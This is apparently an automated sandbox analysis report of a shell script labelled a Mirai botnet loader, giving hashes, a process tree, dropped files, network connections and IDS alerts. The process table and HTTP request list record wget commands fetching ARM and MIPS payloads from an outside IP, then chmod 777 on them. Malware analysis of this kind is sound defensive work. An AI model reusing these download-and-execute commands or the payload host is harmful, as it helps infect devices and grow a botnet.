File name: w.sh

Full analysis: https://app.any.run/tasks/ff9d756a-3fb6-4395-9d09-08436a4aa019
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: April 01, 2026, 05:56:15
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
loader
auto
Indicators:
MIME: text/x-shellscript
File info: POSIX shell script, ASCII text executable
MD5: BB283D5E3CBB8A5C9DDE2B06E8EFC213
SHA1: 85D59627014366E8EA595D37D5659BB01557784C
SHA256: 24D0D3D9346BC42FC669AB17C3B0CD7CB7FD5B04587842ECCDECD40309EB7FD7
SSDEEP: 12:KzFEkUfEEFKNI5rEy3cKrEj+kafaE+oDI/DrHFIgnIqVedIIeIBc/wWI9KI7XU:MNIOKPkAGoUbrSgI8Ehc/Z+U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • MIRAI has been found (auto)

      • wget (PID: 1969)
      • wget (PID: 1973)
      • wget (PID: 1984)
      • wget (PID: 1988)
      • wget (PID: 1992)
    • Loader pattern has been found

      • dash (PID: 1967)
    • MIRAI has been detected (SURICATA)

      • wget (PID: 1988)
      • wget (PID: 1984)
      • wget (PID: 1996)
  • SUSPICIOUS

    • Uses wget to download content

      • dash (PID: 1967)
    • Modifies file or directory owner

      • sudo (PID: 1963)
    • Potential Corporate Privacy Violation

      • wget (PID: 1988)
      • wget (PID: 1984)
      • wget (PID: 1996)
  • INFO

    • Checks timezone

      • wget (PID: 1984)
      • wget (PID: 1973)
      • wget (PID: 1969)
      • wget (PID: 1988)
      • wget (PID: 1992)
      • wget (PID: 1996)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
All screenshots are available in the full report
Total processes: 145
Monitored processes: 23
Malicious processes: 9
Suspicious processes: 0

Behavior graph

Processes shown in the graph, in order (#MIRAI marks processes flagged by the Mirai signature): dash, sudo, chown, chmod, sudo, dash, locale-check, wget (#MIRAI), chmod, dash, wget (#MIRAI), chmod, dash, wget (#MIRAI), chmod, dash, wget (#MIRAI), chmod, dash, wget (#MIRAI), chmod, dash, wget (#MIRAI)

Process information

PID | CMD | Path | Indicators | Parent process
1962 | /bin/sh -c "sudo chown user /tmp/w\.sh && chmod +x /tmp/w\.sh && DISPLAY=:0 sudo -iu user /tmp/w\.sh " | /usr/bin/dash | | 2EwNpII9hL0vkNEQ
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1963 | sudo chown user /tmp/w.sh | /usr/bin/sudo | | dash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1964 | chown user /tmp/w.sh | /usr/bin/chown | | sudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1965 | chmod +x /tmp/w.sh | /usr/bin/chmod | | dash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1966 | sudo -iu user /tmp/w.sh | /usr/bin/sudo | | dash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1967 | /bin/sh /tmp/w.sh | /usr/bin/dash | | sudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
1968 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | | dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1969 | wget http://5.175.223.249/data.arm4 | /usr/bin/wget | | dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
1970 | chmod 777 data.arm4 | /usr/bin/chmod | | dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1971 | /bin/sh /tmp/w.sh | /usr/bin/dash | | dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Executable files: 0
Suspicious files: 5
Text files: 0
Unknown types: 0

Dropped files

PID | Process | Filename | Type
1969 | wget | /home/user/data.arm4 | binary
    MD5:
    SHA256:
1973 | wget | /home/user/data.arm5 | binary
    MD5:
    SHA256:
1984 | wget | /home/user/data.arm6 | binary
    MD5:
    SHA256:
1988 | wget | /home/user/data.arm7 | binary
    MD5:
    SHA256:
1992 | wget | /home/user/data.aarch64 | binary
    MD5:
    SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 16
DNS requests: 14
Threats: 18

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
 | | GET | 204 | 91.189.91.98:80 | http://connectivity-check.ubuntu.com/ | GB | | | whitelisted
1969 | wget | GET | 200 | 5.175.223.249:80 | http://5.175.223.249/data.arm4 | DE | binary | 114 Kb | malicious
1984 | wget | GET | 200 | 5.175.223.249:80 | http://5.175.223.249/data.arm6 | DE | binary | 121 Kb | malicious
1996 | wget | GET | | 5.175.223.249:80 | http://5.175.223.249/data.mips | DE | | | malicious
1988 | wget | GET | 200 | 5.175.223.249:80 | http://5.175.223.249/data.arm7 | DE | binary | 138 Kb | malicious
1992 | wget | GET | 200 | 5.175.223.249:80 | http://5.175.223.249/data.aarch64 | DE | binary | 685 Kb | unknown
1973 | wget | GET | 200 | 5.175.223.249:80 | http://5.175.223.249/data.arm5 | DE | binary | 110 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
456 | avahi-daemon | 224.0.0.251:5353 | | | | whitelisted
 | | 91.189.91.98:80 | connectivity-check.ubuntu.com | CANONICAL-AS | GB | whitelisted
 | | 37.19.194.81:443 | odrs.gnome.org | CDN77 _ | GB | whitelisted
 | | 185.125.188.57:443 | api.snapcraft.io | CANONICAL-AS | GB | whitelisted
 | | 185.125.188.59:443 | api.snapcraft.io | CANONICAL-AS | GB | whitelisted
1969 | wget | 5.175.223.249:80 | | NEXTSOLUTIONS NextSolutions - Hosting Provider DE | DE | malicious
1973 | wget | 5.175.223.249:80 | | NEXTSOLUTIONS NextSolutions - Hosting Provider DE | DE | malicious
1984 | wget | 5.175.223.249:80 | | NEXTSOLUTIONS NextSolutions - Hosting Provider DE | DE | malicious
1988 | wget | 5.175.223.249:80 | | NEXTSOLUTIONS NextSolutions - Hosting Provider DE | DE | malicious
1992 | wget | 5.175.223.249:80 | | NEXTSOLUTIONS NextSolutions - Hosting Provider DE | DE | unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::198
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::197
  • 91.189.91.98
  • 91.189.91.96
  • 91.189.91.97
whitelisted
google.com
  • 142.251.20.102
  • 142.251.20.113
  • 142.251.20.100
  • 142.251.20.101
  • 142.251.20.139
  • 142.251.20.138
  • 2a00:1450:4001:c17::71
  • 2a00:1450:4001:c17::8a
  • 2a00:1450:4001:c17::64
  • 2a00:1450:4001:c17::66
whitelisted
odrs.gnome.org
  • 37.19.194.81
  • 212.102.56.179
  • 79.127.211.90
  • 195.181.175.40
  • 79.127.216.204
  • 195.181.170.19
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c77a::47
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c77a::48
  • 2a02:6ea0:c700::19
whitelisted
api.snapcraft.io
  • 185.125.188.57
  • 185.125.188.54
  • 185.125.188.59
  • 185.125.188.58
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::3da
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::2cc
whitelisted
8.100.168.192.in-addr.arpa
whitelisted
ntp.ubuntu.com
  • 185.125.190.57
  • 185.125.190.58
  • 185.125.190.56
  • 91.189.91.157
  • 2620:2d:4000:1::40
  • 2620:2d:4000:1::41
  • 2620:2d:4000:1::3f
whitelisted

Threats

PID | Process | Class | Message
1969 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
1969 | wget | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .arm file File
1969 | wget | A Network Trojan was detected | BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (arm)
1973 | wget | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .arm file File
1973 | wget | A Network Trojan was detected | BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (arm)
1973 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
1988 | wget | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .arm file File
1984 | wget | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .arm file File
1984 | wget | A Network Trojan was detected | BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (arm)
1988 | wget | Potentially Bad Traffic | ET INFO ARM7 File Download Request from IP Address
No debug info